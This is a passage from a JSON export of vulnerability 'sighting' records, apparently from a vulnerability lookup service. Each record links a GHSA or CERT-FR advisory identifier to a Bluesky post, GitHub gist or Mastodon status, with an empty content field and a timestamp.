"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-vrhm-gvg7-fpcf", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfany5xe432p", "content": "", "creation_timestamp": "2026-02-19T22:40:03.880818Z"}, {"uuid": "0bdd9fd0-2f6f-4a44-b003-0e1faf28e412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-J9WF-6R2X-HQMX", "type": "seen", "source": "https://gist.github.com/alon710/81f901f3d9de09eb9c69ce4eb9dfc88e", "content": "", "creation_timestamp": "2026-02-20T01:40:40.000000Z"}, {"uuid": "5e9b5452-6117-4d7a-a92d-e46078b374b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-j9wf-6r2x-hqmx", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfaz6qijzk2s", "content": "", "creation_timestamp": "2026-02-20T02:00:35.783346Z"}, {"uuid": "5740d833-b58e-4b62-9e12-c3013800853e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6C9J-X93C-RW6J", "type": "seen", "source": "https://gist.github.com/alon710/f4eee2d51384628d064473d1a040d3d4", "content": "", "creation_timestamp": "2026-02-20T02:10:39.000000Z"}, {"uuid": "c531cd6b-fd91-4868-9d80-54802e21c044", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4685-c5cp-vp95", "type": "seen", "source": "https://gist.github.com/alon710/dd9d81556c24a9d1978023563237aa81", "content": "", "creation_timestamp": "2026-02-20T02:40:39.000000Z"}, {"uuid": "914af52b-ee40-4a71-81fa-7a3d89803aa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-6c9j-x93c-rw6j", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfb3galb2g2s", "content": "", "creation_timestamp": "2026-02-20T02:40:34.931324Z"}, {"uuid": "8955f560-a6c1-4023-87b6-db9bc09ead02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-299v-8pq9-5gjq", "type": "seen", "source": "https://gist.github.com/alon710/95d75a59b32de2eaa17ab17568afc3b1", "content": "", "creation_timestamp": "2026-02-25T01:08:27.000000Z"}, {"uuid": "17ea51cf-2139-4c12-8c88-25cea03bc02f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w6x6-9fp7-fqm4", "type": "seen", "source": "https://gist.github.com/alon710/68c583067a866cb7fed31e74cd847b36", "content": "", "creation_timestamp": "2026-02-25T01:08:26.000000Z"}, {"uuid": "67f153ed-df11-4a51-addd-5ec62f0c1adc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3jh3-prx3-w6wc", "type": "seen", "source": "https://gist.github.com/alon710/fc4d8867e34aa7777c11ab15e3f28950", "content": "", "creation_timestamp": "2026-02-25T01:08:24.000000Z"}, {"uuid": "24e332a7-7dbd-41d3-b599-a629a3597e6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6fx5-5cw5-4897", "type": "seen", "source": "https://gist.github.com/alon710/8e3d60e2310dc13fae41246bc5dac4c9", "content": "", "creation_timestamp": "2026-02-25T01:08:23.000000Z"}, {"uuid": "3031b52f-881a-4a93-ad9c-9bfbdc466cba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gp2f-7wcm-5fhx", "type": "seen", "source": "https://gist.github.com/alon710/3f7f74f3d1eb4a242e59e84127b6e27c", "content": "", "creation_timestamp": "2026-02-25T01:08:21.000000Z"}, {"uuid": "6fac81d4-0b28-481f-b785-1af596ef7851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g3gw-q23r-pgqm", "type": "seen", "source": "https://gist.github.com/alon710/3c4ee34d2cdc53cc5dccf62f09e44104", "content": "", "creation_timestamp": "2026-02-25T01:08:20.000000Z"}, {"uuid": "453432d6-c85d-4d23-b9db-141a193e5b19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xxh2-68g9-8jqr", "type": "seen", "source": "https://gist.github.com/alon710/c747a5bfea37c2e9ad96d1646d21077f", "content": "", "creation_timestamp": "2026-02-25T01:08:19.000000Z"}, {"uuid": "d30b5ffa-8a84-4965-a39a-efa0cf2a9375", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rcqw-6466-3mv7", "type": "seen", "source": "https://gist.github.com/alon710/7f3ee8f74d3d01aa3cdc38f77e2a5fda", "content": "", "creation_timestamp": "2026-02-25T01:08:18.000000Z"}, {"uuid": "744d548f-b9a1-4303-97aa-53dd31d49e00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gxcx-qjqp-8vjw", "type": "seen", "source": "https://gist.github.com/alon710/6e6e6e4c81d80b002d5451729c5d86bb", "content": "", "creation_timestamp": "2026-02-25T01:08:17.000000Z"}, {"uuid": "da90c5ec-aeb2-46e9-a093-288447c57f49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qrvq-68c2-7grw", "type": "seen", "source": "https://gist.github.com/alon710/fd5d02a6656a9e8c9e49f270ac2dcd9c", "content": "", "creation_timestamp": "2026-02-25T01:08:14.000000Z"}, {"uuid": "0bd9ab51-0986-4588-822e-1e87b7fa9eaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9fww-8cpr-q66r", "type": "seen", "source": "https://gist.github.com/alon710/b49abcb62186b1e9a08e776c001b1b45", "content": "", "creation_timestamp": "2026-02-25T01:08:13.000000Z"}, {"uuid": "ee00112e-8713-4d13-b262-7447b2a3aee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v2gc-rm6g-wrw9", "type": "seen", "source": "https://gist.github.com/alon710/2a6bff36b163c3eb59d13fedcce793b9", "content": "", "creation_timestamp": "2026-02-25T01:08:11.000000Z"}, {"uuid": "cedaabb4-79e6-4c66-a502-d6accbe61b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w8mw-frc6-r7m8", "type": "seen", "source": "https://gist.github.com/alon710/cf6e093924dbe3a17530e5f8abbb07c8", "content": "", "creation_timestamp": "2026-02-25T01:08:09.000000Z"}, {"uuid": "4b78b2ad-63a5-4281-b510-51fed5d4ea6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gwr3-x37h-h84v", "type": "seen", "source": "https://gist.github.com/alon710/5e35b72698f3cf694fe848d6fa99d6b9", "content": "", "creation_timestamp": "2026-02-25T01:08:08.000000Z"}, {"uuid": "9b23d2f1-0541-46d1-bb97-995067b822c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v994-63cg-9wj3", "type": "seen", "source": "https://gist.github.com/alon710/93497b272a1acc6d5d3838b0e2ce709a", "content": "", "creation_timestamp": "2026-02-25T01:08:07.000000Z"}, {"uuid": "2fb73e25-e295-49c8-963f-efcead84c7a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-78qv-3mpx-9cqq", "type": "seen", "source": "https://gist.github.com/alon710/2374cc8dbd605d3c0e5e8ece442a11db", "content": "", "creation_timestamp": "2026-02-25T01:08:04.000000Z"}, {"uuid": "d2497d39-c7f3-4634-9838-6ffdc822396f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hffm-g8v7-wrv7", "type": "seen", "source": "https://gist.github.com/alon710/177bc56435a712bb75c34d81b34d8075", "content": "", "creation_timestamp": "2026-02-25T01:08:03.000000Z"}, {"uuid": "06a229f7-7a75-4ee9-9fad-d653a189247e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g966-83w7-6w38", "type": "seen", "source": "https://gist.github.com/alon710/b23e84fd74b0099ad7b9c6587db73222", "content": "", "creation_timestamp": "2026-02-25T01:08:02.000000Z"}, {"uuid": "0d5bc6ba-19aa-46d7-94a5-f40933106385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5r3v-vc8m-m96g", "type": "seen", "source": "https://gist.github.com/alon710/b23e84fd74b0099ad7b9c6587db73222", "content": "", "creation_timestamp": "2026-02-25T01:08:02.000000Z"}, {"uuid": "207a83ce-e514-4d78-b5c1-79e19c6e4920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mrq8-rjmw-wpq3", "type": "seen", "source": "https://gist.github.com/alon710/017c6f94d4b400550f2057eef847b3e2", "content": "", "creation_timestamp": "2026-02-25T01:08:01.000000Z"}, {"uuid": "8645baa9-b879-4637-9562-7c1b9ed34596", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MXHJ-88FX-4PCV", "type": "seen", "source": "https://gist.github.com/alon710/34a8089808c667d1d6688fd96471ead4", "content": "", "creation_timestamp": "2026-02-25T01:07:59.000000Z"}, {"uuid": "f3de53aa-3451-494e-8ed3-5c6a8bb41daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxq9-79vj-rgvw", "type": "seen", "source": "https://gist.github.com/alon710/12958c247a7b9f50af1a0648fa1cd2df", "content": "", "creation_timestamp": "2026-02-25T01:07:58.000000Z"}, {"uuid": "5268c450-a9d2-40e1-ad2b-19d98f92aa7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2mr3-m5q5-wgp6", "type": "seen", "source": "https://gist.github.com/alon710/7f520ac338ee302e6bfcbcbe99b6a4cd", "content": "", "creation_timestamp": "2026-02-25T01:07:56.000000Z"}, {"uuid": "72ff07f8-3505-484b-af65-d4ec26a85b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6v48-fcq6-ff23", "type": "seen", "source": "https://gist.github.com/alon710/480174591eb6132e0bdd40c5ba8bebdc", "content": "", "creation_timestamp": "2026-02-25T01:07:53.000000Z"}, {"uuid": "88f9a03b-0d47-4e1c-87f0-8d98e5f6ed17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-852m-cvvp-9p4w", "type": "seen", "source": "https://gist.github.com/alon710/4e9c4bed9ad14feae28c1474018f41b3", "content": "", "creation_timestamp": "2026-02-25T01:07:51.000000Z"}, {"uuid": "1c103761-482e-4a7b-a252-f2525520c8f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5hxf-c7j4-279c", "type": "seen", "source": "https://gist.github.com/alon710/d73d499cf1d6e8d3c3762966f6b93ea2", "content": "", "creation_timestamp": "2026-03-12T19:40:05.000000Z"}, {"uuid": "b58fcdc5-a0cc-4cb5-a11b-4479577a18f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V8W9-8MX6-G223", "type": "seen", "source": "https://gist.github.com/alon710/ebad4ba77668bb561825692b022ec277", "content": "", "creation_timestamp": "2026-03-11T05:40:06.000000Z"}, {"uuid": "33940934-b98d-4098-999f-da42e07a3fc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rqr9-jwwf-wxgj", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mj6htagxnz2d", "content": "", "creation_timestamp": "2026-04-10T23:25:22.907456Z"}, {"uuid": "8baebf6c-4f92-44dd-96c9-c39f0d43f3d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-46g3-37rh-v698", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mhdpj5l7kt2u", "content": "", "creation_timestamp": "2026-03-18T14:35:49.859833Z"}, {"uuid": "355e309e-6e30-4b58-855b-fbd1df841228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/942fea566de350ee415fd4c970d46478", "content": "", "creation_timestamp": "2026-04-11T02:08:15.000000Z"}, {"uuid": "96f12339-4f97-46e7-ad37-5376825530f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/942fea566de350ee415fd4c970d46478", "content": "", "creation_timestamp": "2026-04-11T02:08:15.000000Z"}, {"uuid": "df2f0d14-af73-488c-b96e-929bb434f5fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xq3m-2v4x-88gg", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3mjvsm7eyf42n", "content": "", "creation_timestamp": "2026-04-20T06:09:32.269918Z"}, {"uuid": "d98343d3-72b3-4121-a94f-26b49429fac2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-018", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mjwhnnjfjr2y", "content": "", "creation_timestamp": "2026-04-20T12:26:09.131779Z"}, {"uuid": "742e99c2-72e5-4adc-8b06-ab010b336039", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-015", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mjbe4yzibh2t", "content": "", "creation_timestamp": "2026-04-12T02:57:19.751021Z"}, {"uuid": "48365069-2c0e-49ad-8c8e-94d01fce56b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-018", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mjwlq7lk6a2i", "content": "", "creation_timestamp": "2026-04-20T13:39:09.897579Z"}, {"uuid": "ea57d5ac-51a7-44ed-b926-4e91ee7d69af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-xq3m-2v4x-88gg", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mjwqbk2ru32v", "content": "", "creation_timestamp": "2026-04-20T15:00:26.485105Z"}, {"uuid": "2fb5e839-aa62-4cf4-8b77-ba0d5298f67c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://bsky.app/profile/dailyzenntrends.bsky.social/post/3mjenqphjzk2b", "content": "", "creation_timestamp": "2026-04-13T10:27:19.369619Z"}, {"uuid": "24d1e335-33fc-4dcb-9197-40830e1a4f44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p68-rc4w-qgx5", "type": "seen", "source": "https://gist.github.com/subaruoutbacksteakhouse/755867cb60dca06f145990b4865d6eee", "content": "", "creation_timestamp": "2026-04-13T12:02:56.000000Z"}, {"uuid": "1fdd3f66-1af1-41a5-8737-549616162203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-chqc-8p9q-pq6q", "type": "seen", "source": "https://gist.github.com/subaruoutbacksteakhouse/755867cb60dca06f145990b4865d6eee", "content": "", "creation_timestamp": "2026-04-13T12:02:56.000000Z"}, {"uuid": "a781ec99-8c02-49a1-9054-3ffc2cbe6200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8gc5-j5rx-235r", "type": "seen", "source": "https://gist.github.com/subaruoutbacksteakhouse/755867cb60dca06f145990b4865d6eee", "content": "", "creation_timestamp": "2026-04-13T12:02:56.000000Z"}, {"uuid": "cb2e5a7b-b393-4474-80dc-efb204d22945", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-017", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116397695370532777", "content": "", "creation_timestamp": "2026-04-13T13:44:48.061095Z"}, {"uuid": "a80cae6f-a9c6-4b48-b757-d993a3b476b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-017", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mjeyroej5f2c", "content": "", "creation_timestamp": "2026-04-13T13:44:42.367303Z"}, {"uuid": "0a9dc067-68ed-49ec-b65f-2b6e11301a1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-017", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mjezj7kc5r2o", "content": "", "creation_timestamp": "2026-04-13T13:57:52.313792Z"}, {"uuid": "b4c246ca-a451-47ee-b277-9ad0ec8474d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-8q4h-8crm-5cvc", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3mjytdcford24", "content": "", "creation_timestamp": "2026-04-21T11:00:26.275805Z"}, {"uuid": "ac284f8c-32ab-4fa9-81b8-a229ae40ef61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mw96-cpmx-2vgc", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "b0950b52-f1cd-4ae2-93f9-5934b6ab33e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7fw-mjwx-w883", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "67a819e7-9141-4dfc-b0ee-f85f5bd87702", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-43fc-jf86-j433", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "d57f1853-5352-483f-b0c9-97e1f0befa78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-37qj-frw5-hhjh", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "7859e992-d569-4881-aea4-0e15a9d7d1c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "94532685-2259-42c1-9296-f1e135d8ce6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ppc-4f35-3m26", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "5641d865-1d47-4253-9d14-bd5b10834619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fj3w-jwp8-x2g3", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "22b464c0-b262-4183-a8fc-da160950fbd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mw96-cpmx-2vgc", "type": "seen", "source": "https://gist.github.com/MindfulLearner/6d7eef9c065da267822dabd41aeaec98", "content": "", "creation_timestamp": "2026-04-21T11:51:12.000000Z"}, {"uuid": "24ca97c3-a24f-410b-b7b0-e7e64ec5c4ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7fw-mjwx-w883", "type": "seen", "source": "https://gist.github.com/MindfulLearner/6d7eef9c065da267822dabd41aeaec98", "content": "", "creation_timestamp": "2026-04-21T11:51:12.000000Z"}, {"uuid": "6c8ab227-1efe-4907-bac0-910ceb6867b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-43fc-jf86-j433", "type": "seen", "source": "https://gist.github.com/MindfulLearner/6d7eef9c065da267822dabd41aeaec98", "content": "", "creation_timestamp": "2026-04-21T11:51:12.000000Z"}, {"uuid": "2870a31c-8417-4154-9cdf-c262f3a8e348", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-37qj-frw5-hhjh", "type": "seen", "source": "https://gist.github.com/MindfulLearner/6d7eef9c065da267822dabd41aeaec98", "content": "", "creation_timestamp": "2026-04-21T11:51:12.000000Z"}, {"uuid": "006c1bdb-9995-4bcb-8f13-5811caedf901", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/MindfulLearner/6d7eef9c065da267822dabd41aeaec98", "content": "", "creation_timestamp": "2026-04-21T11:51:12.000000Z"}, {"uuid": "a5a269b2-2b63-4d45-83ed-82c5b1e67f68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ppc-4f35-3m26", "type": "seen", "source": "https://gist.github.com/MindfulLearner/6d7eef9c065da267822dabd41aeaec98", "content": "", "creation_timestamp": "2026-04-21T11:51:12.000000Z"}, {"uuid": "d6607dd2-50e6-46a4-bb28-9647c4d104f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fj3w-jwp8-x2g3", "type": "seen", "source": "https://gist.github.com/MindfulLearner/6d7eef9c065da267822dabd41aeaec98", "content": "", "creation_timestamp": "2026-04-21T11:51:12.000000Z"}, {"uuid": "6ae7abe0-222a-472f-b2e7-5512172f7dd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5c6j-r48x-rmvq", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "b730836f-16a5-4ee2-9ce1-e1f68c411269", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j3q9-mxjg-w52f", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "ec28eb6d-bce9-4f22-be02-c6eb0ffb2e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4w7w-66w2-5vf9", "type": "seen", "source": "https://gist.github.com/MindfulLearner/c8453868d5bef6ee64c2f01d7c7f658d", "content": "", "creation_timestamp": "2026-04-21T11:56:50.000000Z"}, {"uuid": "1b4dad4f-8cdf-4efc-8010-f9bd641f1862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r4q5-vmmm-2653", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mjhdhgn23o2t", "content": "", "creation_timestamp": "2026-04-14T12:01:09.234485Z"}, {"uuid": "3b0a6492-5be2-47a6-bc63-13c4bf8e1235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-016", "type": "seen", "source": "https://bsky.app/profile/macsouverain.bsky.social/post/3mjhiefzp3q2z", "content": "", "creation_timestamp": "2026-04-14T13:28:56.831429Z"}, {"uuid": "464d6796-63d9-4255-9e48-9c1a7557eba6", "vulnerability_lookup_origin": 